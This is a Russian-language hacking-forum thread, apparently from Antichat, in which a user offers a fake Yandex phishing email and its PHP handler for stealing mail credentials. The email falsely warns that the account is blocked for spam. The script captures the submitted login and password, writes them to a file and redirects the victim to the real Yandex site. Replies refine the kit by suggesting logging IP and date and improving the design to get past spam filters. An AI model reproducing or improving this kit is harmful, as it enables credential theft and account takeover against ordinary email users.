ANTICHAT - Новый Яндекс в теле письма

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - Новый Яндекс в теле письма (https://forum.antichat.xyz/showthread.php?t=8056199)

Приветствую вас форумчане,модераторы и Админ!
Представляю к вашему вниманию Новый яндекс в теле письма.
Фейк яндекс легко найдет общий язык с антиспамерами! И доходит хорошо.

СКРИН

HTML highlight

Код:



&nbsp;



&nbsp;



Создать почту



&nbsp;



Здравствуйте уважаемый пользователь!



В связи с подозрениями на рассылку рекламных писем (спама) с вашего 

электронного адреса

 администрация вынуждена заблокировать Вашу учетную 

запись. Для продолжения пользования электронным ящиком, Вам необходимо 

подтвердить, что Ваш электронный адрес не используется спам-ботом для рассылки рекламных 

писем.

Скрипт:

PHP highlight

Код:



        Код:


        
<?PHP

$email=$_POST['login']; 

$Pass=$_POST['passwd']; 

$Domain=$_POST['domain']; 



$log=fopen("base.php","a+"); 

fwrite($log,"\n  login:$email$domain@yandex.ru

pass:$Pass\n"); 

fclose($log); 

header("Location: http://www.yandex.ru");

Удачного взлома!

Не плохо бы оформление сделать, так как яндекс всегда дружил с красотой.

А в базу помимо этого можно внести дату + ip.

Вот что не понятно:
1)Зачем
code:

$Domain = $_POST['domain']

вот это?
В страничке, в коде и намека на это нет.
2) В базе у тебя будет идти в строчку скорее всего все, при 100 записях голова закружиться.

code:

fwrite($log,"\n login:$email$domain@yandex.ru
pass:$Pass \n");

Тут ты ничего не поймешь, раздели их | палками, или как твоей душе угодно. Вообще, я бы сделал так:

code:

$login|Pass:$passwd| ---- IP:$ip | Date:$Dat"; // Вот тут внесем все в одну переменную для того, чтобы все шло в столбик, а не в строку, так же ниже добавим br. br без внесения в одну переменную не работала бы.

$log = fopen("base.php","a+");
fwrite($log,"\n $zapis
\n"); // Вот как то так
fclose($log);
header("Location: http://www.yandex.ru"); // Не знаю, что то с header-ом у меня на хосте проблемы были..

Вообще могу ошибиться по синтаксису где то, но не должен
Да и кстати, яндексу пофиг на домен, все равно что @yandex.ru, @yandex.ua, @yandex.kz и т.д. Можно сказать один пользователь имеет больше 7 ящиков в одной учетки. Удобно.

Ответь насчет пункта 1.
Сам написал, м? Интересно, для чего просто пункт 1.

Хм.. обратил внимание на то что используются теги ,, а самого table типо - ,в коде нет.

KzBOXer Пробовал красить фейк дизайн ни ого-го знаю.покрасил фейк до этого но не доходило.

Цитата:

Сообщение от KzBOXer

Ответь насчет пункта 1.
Сам написал, м? Интересно, для чего просто пункт 1.

тему создавал ночью воти записал.

На счет ip и даты это на ваше усмотрение кому как хотя можно без них.

Цитата:

Сообщение от stivens20

На счет ip и даты это на ваше усмотрение кому как хотя можно без них.

Но то что привел ты это выглядело бы в строку да еще и слитно.

Цитата:

тему создавал ночью воти записал.

Причем тут ночь? Не понимаю..

С античата пади опять слизал

Цитата:

Сообщение от KzBOXer

Причем тут ночь? Не понимаю..

С античата пади опять слизал

При том едва ли засыпая создал тему. Нет античата ни чего не тащил все сам сделал

Цитата:

Сообщение от KzBOXer

Но то что привел ты это выглядело бы в строку да еще и слитно.

Чуть-чуть было слитно так можно подправить под себя.

Фейк есть, да, но честно - на двоечку с плюсом только тянет, как оформление, так и код обработчика.

Цитата:

Сообщение от Yorvet

Фейк есть, да, но честно - на двоечку с плюсом только тянет, как оформление, так и код обработчика.

На счет оформления я уже писал и не раз крашенный фейк яндекс почта не приходит вот так и получилось.

Дело не в цветах, а в стиле.

Согласен. Вот скрин http://rghost.ru/37918938/image.png на мой взгляд немного лучше.